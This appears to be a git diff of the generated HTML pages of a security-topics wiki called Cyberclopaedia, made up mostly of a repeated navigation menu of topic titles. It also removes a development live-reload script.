          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -257,22 +257,6 @@

- const wsProtocol = location.protocol === 'https:' ? 'wss:' : 'ws:'; - const wsAddress = wsProtocol + "//" + location.host + "/" + "__livereload"; - const socket = new WebSocket(wsAddress); - socket.onmessage = function (event) { - if (event.data === "reload") { - socket.close(); - location.reload(); - } - }; - - window.onbeforeunload = function() { - socket.close(); - } - diff --git a/docs/Networking/Protocols/index.html b/docs/Networking/Protocols/index.html index d39bc0b2..0348b269 100644 --- a/docs/Networking/Protocols/index.html +++ b/docs/Networking/Protocols/index.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -175,22 +175,6 @@

Introduction - - diff --git a/docs/Networking/Subnetting.html b/docs/Networking/Subnetting.html index c4dee201..61f0c5de 100644 --- a/docs/Networking/Subnetting.html +++ b/docs/Networking/Subnetting.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
